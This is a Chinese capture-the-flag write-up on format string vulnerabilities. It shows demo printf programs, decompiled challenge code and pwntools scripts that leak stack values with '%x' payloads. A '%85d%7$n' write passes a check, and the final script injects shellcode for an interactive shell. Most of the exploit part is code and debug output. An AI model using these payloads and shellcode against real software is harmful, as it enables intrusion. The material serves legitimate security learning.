格式化字符串漏洞分析与解题方法

//fmtdemo1.c#include<stdio.h>void main(){   printf("%s %d %s", "Hello World!", 233, "\n");}
编译：gcc -m32 fmtdemo1.c  -o fmtdemo -g
└─# ./fmtdemo                                                                                       33 ⨯Hello World! 233 

#fmtdemo2.c#include<stdio.h>void main() {  printf("%s %d %s %x %x %x %3$s", "Hello World!", 233, "\n");}
└─# ./fmtdemo2 Hello World! 233  ffffd450 0 0

secret[0] is 12C42a0secret[1] is 12C42a4

　v4 = malloc(8uLL);  *v4 = 68;  v4[1] = 85;  puts("we are wizard, we will give you hand, you can not defeat dragon by yourself ...");  puts("we will tell you two secret ...");  printf("secret[0] is %x\n", v4);  printf("secret[1] is %x\n", v4 + 1);  puts("do not tell anyone ");

if ( *a1 == a1[1] )  {    puts("Wizard: I will help you! USE YOU SPELL");    v1 = mmap(0LL, 0x1000uLL, 7, 33, -1, 0LL);    read(0, v1, 0x100uLL);    ((void (__fastcall *)(_QWORD))v1)(0LL);  }

　*v4 = 68;  v4[1] = 85;  puts("we are wizard, we will give you hand, you can not defeat dragon by yourself ...");  puts("we will tell you two secret ...");  printf("secret[0] is %x\n", v4);  printf("secret[1] is %x\n", v4 + 1);  puts("do not tell anyone ");  sub_400D72((__int64)v4);

#!python#!/usr/bin/env python# coding=utf-8 from pwn import *context(log_level = 'debug', arch = 'amd64', os = 'linux')p = process('./string')payload = 'A'*4 + '.%x'*10 p.sendlineafter('be:\n', 'aaa')p.sendlineafter('up?:\n', 'east')p.sendlineafter('leave(0)?:\n', '1')p.sendlineafter("address'\n", '1')p.sendlineafter('is:\n', payload)p.interactive()

[DEBUG] Received 0x12 bytes:    b'And, you wish is:\n'[DEBUG] Sent 0x23 bytes:    b'AAAA.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x\n'[*] Switching to interactive mode[*] Process './string' stopped with exit code 0 (pid 6346)[DEBUG] Received 0x177 bytes:    b'Your wish is\n'    b'AAAA.f7fa9743.0.f7ed8963.d.ffffff88.0.1.41414141.252e7825.2e78252eI hear it, I hear it....\n'    b'Ahu!!!!!!!!!!!!!!!!A Dragon has appeared!!\n'    b'Dragon say: HaHa! you were supposed to have a normal\n'    b'RPG game, but I have changed it! you have no weapon and \n'    b'skill! you could not defeat me !\n'    b"That's sound terrible! you meet final boss!but you level is ONE!\n"    b'The End.....Really?\n'Your wish isAAAA.f7fa9743.0.f7ed8963.d.ffffff88.0.1.41414141.252e7825.2e78252eI hear it, I hear it....Ahu!!!!!!!!!!!!!!!!A Dragon has appeared!!Dragon say: HaHa! you were supposed to have a normalRPG game, but I have changed it! you have no weapon and skill! you could not defeat me !That's sound terrible! you meet final boss!but you level is ONE!The End.....Really?[*] Got EOF while reading in interactive

[DEBUG] Received 0x17a bytes:    b'Your wish is\n'    b'AAAA.f7fa9743.0.f7ed8963.d.ffffff88.0.1111.41414141.252e7825.2e78252eI hear it, I hear it....\n'    b'Ahu!!!!!!!!!!!!!!!!A Dragon has appeared!!\n'    b'Dragon say: HaHa! you were supposed to have a normal\n'    b'RPG game, but I have changed it! you have no weapon and \n'    b'skill! you could not defeat me !\n'    b"That's sound terrible! you meet final boss!but you level is ONE!\n"    b'The End.....Really?\n'Your wish isAAAA.f7fa9743.0.f7ed8963.d.ffffff88.0.1111.41414141.252e7825.2e78252eI hear it, I hear it....Ahu!!!!!!!!!!!!!!!!A Dragon has appeared!!Dragon say: HaHa! you were supposed to have a normalRPG game, but I have changed it! you have no weapon and skill! you could not defeat me !That's sound terrible! you meet final boss!but you level is ONE!The End.....Really?[*] Got EOF while

#!python#!/usr/bin/env python# coding=utf-8 from pwn import *context(log_level = 'debug', arch = 'amd64', os = 'linux')p = process('./string')p.recvuntil('secret[0] is ')addr = int(p.recvuntil('\n'), 16) payload = '%85d%7$n' p.sendlineafter('be:\n', 'aaa')p.sendlineafter('up?:\n', 'east')p.sendlineafter('leave(0)?:\n', '1')p.sendlineafter("address'\n", str(addr))p.sendlineafter('is:\n', payload)p.interactive()

[DEBUG] Received 0x12 bytes:    b'And, you wish is:\n'[DEBUG] Sent 0x9 bytes:    b'%85d%7$n\n'[*] Switching to interactive mode[DEBUG] Received 0x19d bytes:    b'Your wish is\n'    b'                                                                           -134572221I hear it, I hear it....\n'    b'Ahu!!!!!!!!!!!!!!!!A Dragon has appeared!!\n'    b'Dragon say: HaHa! you were supposed to have a normal\n'    b'RPG game, but I have changed it! you have no weapon and \n'    b'skill! you could not defeat me !\n'    b"That's sound terrible! you meet final boss!but you level is ONE!\n"    b'Wizard: I will help you! USE YOU SPELL\n'Your wish is                                                                           -134572221I hear it, I hear it....Ahu!!!!!!!!!!!!!!!!A Dragon has appeared!!Dragon say: HaHa! you were supposed to have a normalRPG game, but I have changed it! you have no weapon and skill! you could not defeat me !That's sound terrible! you meet final boss!but you level is ONE!Wizard: I will help you! USE YOU SPELL[*] Got EOF while reading in interactive$

#!python#!/usr/bin/env python# coding=utf-8from pwn import *#p = remote('111.200.241.244','54236')p = process('./string')p.recvuntil('secret[0] is ')# 获取第四位的地址，用切片切掉最后的\n，开始的空格在上面的 recvuntil 中# 获得的数字直接用 int(x, 16) 即可转成十进制整型储存在 addr 中addr = int(p.recvuntil('\n')[:-1], 16)
p.recvuntil('name be:\n')p.sendline('wellsong')p.recvuntil('up?:\n')p.sendline('east')p.recvuntil('leave(0)?:')p.sendline('1')p.recv()p.sendline(str(addr))p.recv()p.sendline('%85x%7$n')rec = p.recvuntil('SPELL\n')
context(os='linux', arch='amd64')p.sendline(asm(shellcraft.sh()))p.interactive()